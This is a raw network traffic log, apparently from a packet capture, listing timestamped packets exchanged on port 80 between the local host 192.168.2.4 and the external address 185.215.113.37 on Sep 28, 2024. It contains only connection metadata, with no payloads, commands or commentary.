Sep 28, 2024 07:32:11.832207918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.832828999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.832878113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.832885027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.832917929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.832928896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.832967043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833034039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833066940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833080053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833101034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833107948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833153009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833210945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833242893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833256960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833276033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833285093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833308935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833323002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833340883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833349943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833376884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833385944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833411932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833492041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833522081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833534956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833554029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833568096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833585978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833594084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833620071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833626032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833653927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833667994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833693027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833761930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833805084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833811998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833843946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833853960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833877087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833888054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833909988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833916903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833942890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.833950043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.833992958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834137917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834170103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834187031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834202051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834213018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834234953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834243059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834268093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834276915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834299088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834307909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834331036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834336042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834363937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834372997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834398031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834403992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834430933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834440947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834464073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834470034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834496975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834503889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834530115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834537983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834569931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834799051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834830046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834860086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834892035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834923029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834954977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.834960938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.834988117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835009098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835019112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835031033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835052013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835061073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835084915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835099936 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835118055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835128069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835151911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835160017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835194111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835339069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835371017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835390091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835413933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835419893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835453033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835464954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835484982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835494041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835517883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835529089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835550070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835561037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835593939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835844040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835875988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835900068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835907936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835916996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835939884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835952044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.835974932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.835984945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836008072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836018085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836040974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836050034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836074114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836085081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836108923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836117029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836142063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836150885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836174011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836180925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836204052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836216927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836245060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836343050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836374998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836386919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836406946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836416960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836440086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836447001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836472034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836483002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836504936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836513042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836538076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836546898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836570978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836580038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836604118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836612940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836637974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836644888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836669922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836679935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836702108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836711884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836731911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836744070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836765051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836772919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836797953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836807013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836832047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836842060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836863995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.836878061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.836900949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837296009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837328911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837348938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837361097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837368011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837393045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837399006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837424994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837438107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837457895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837466955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837490082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837501049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837522030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837531090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837551117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837563038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837584019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837593079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837618113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837625027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837651014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837661028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837685108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837692022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837718010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837728977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837750912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837759018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837784052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837791920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837816954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837826014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837850094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837858915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837882042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.837891102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.837924004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.838138103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.838174105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.838187933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.838206053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.838219881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.838238001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.838247061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.838270903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.838279009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.838303089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.838310957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.838345051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.838350058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.838385105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.838392973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.838418007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.838427067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.838462114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.919975042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920025110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920070887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920082092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920089006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920114994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920131922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920145035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920156002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920188904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920195103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920228004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920233965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920259953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920269966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920295000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920305967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920337915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920569897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920602083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920618057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920634031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920643091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920676947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920696020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920727015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920739889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920758963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920778036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920793056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920806885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920825958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920835018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920870066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920913935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.920959949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.920994043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921025038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921039104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921057940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921068907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921091080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921099901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921133995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921210051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921241999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921256065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921273947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921284914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921309948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921315908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921350002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921360016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921391964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921402931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921425104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921432972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921458960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921466112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921500921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921509027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921540976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921547890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921581984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921588898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921617031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921633959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921648026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921653986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921680927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921688080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921713114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921724081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921746016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921755075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921778917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921786070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921823025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.921895981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.921943903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922029018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922055960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922072887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922086954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922096014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922118902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922128916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922149897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922161102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922183990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922189951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922215939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922224998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922249079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922255039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922276974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922297001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922308922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922313929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922348976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922352076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922390938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922454119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922485113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922497034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922517061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922527075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922549009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:11.922557116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:11.922581911 CEST	80	49730	185.215.113.37	192.168.2.4
